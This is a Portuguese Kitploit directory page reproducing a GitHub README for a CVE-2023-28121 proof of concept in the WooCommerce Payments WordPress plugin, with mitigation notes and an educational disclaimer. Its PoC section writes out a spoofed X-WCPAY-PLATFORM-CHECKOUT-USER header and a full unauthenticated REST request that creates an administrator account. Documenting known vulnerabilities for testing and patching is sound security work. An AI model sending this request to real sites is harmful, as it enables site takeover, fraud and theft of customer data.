Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/luisdevpentest/cve-2023-28121-wordpress-privilege-escalation
Autenticação e AutorizaçãoEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubluisdevpentest/cve-2023-28121-wordpress-privilege-escalation

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-28121-WordPress-Privilege-Escalation

Exploração prática de vulnerabilidade crítica no WordPress usando o plugin WooCommerce Payments.

Ver Repositório
1há 3 mesesAinda não revisado

🔐 CVE-2023-28121 — WordPress Privilege Escalation

Exploração prática de vulnerabilidade crítica no WordPress usando o plugin WooCommerce Payments.


📌 Resumo

A CVE-2023-28121 permite criar usuários administradores sem autenticação via REST API.

  • Severidade: Crítica (CVSS 9.8)
  • Impacto: Controle total do site
  • Tipo: Authentication Bypass / Privilege Escalation
  • +600.000 instalações ativas - Março de 2023 https://www.wiz.io/vulnerability-database/cve/cve-2023-28121?utm_source=chatgpt.com

📊 O plugin afetado possui centenas de milhares de instalações, sendo amplamente usado em e-commerces.


🎥 Demonstração

https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44


⚠️ Como funciona

O sistema aceita um header manipulável:

root@kitploit:~
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

Com isso, é possível enviar uma requisição para criação de usuário com privilégios elevados sem autenticação válida.


🧪 PoC

root@kitploit:~
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

{
  "username": "hacked",
  "password": "StrongPass123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

✔️ Resultado: criação de usuário admin


🔥 Impacto

  • Criação de administrador
  • Acesso ao painel /wp-admin
  • Possível takeover completo
  • Risco de fraude e vazamento de dados

🛠️ Mitigação

  • Atualizar o plugin para versão corrigida
  • Restringir acesso à REST API
  • Validar corretamente autenticação

🧱 Ambiente

  • WordPress (lab local)
  • WooCommerce Payments (versão vulnerável)

📚 Referências

  • CVE-2023-28121
  • Documentação REST API WordPress
  • https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/

👨‍💻 Autor

Luis Eduardo .M.B.S.R

Pentester / Web Security

LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/

GitHub: https://github.com/luisdevpentest

⚖️ Disclaimer

Uso educacional em ambiente controlado. Não me responsabiliso de como é usado tal conhecimento por terceiros.


Baixar ferramenta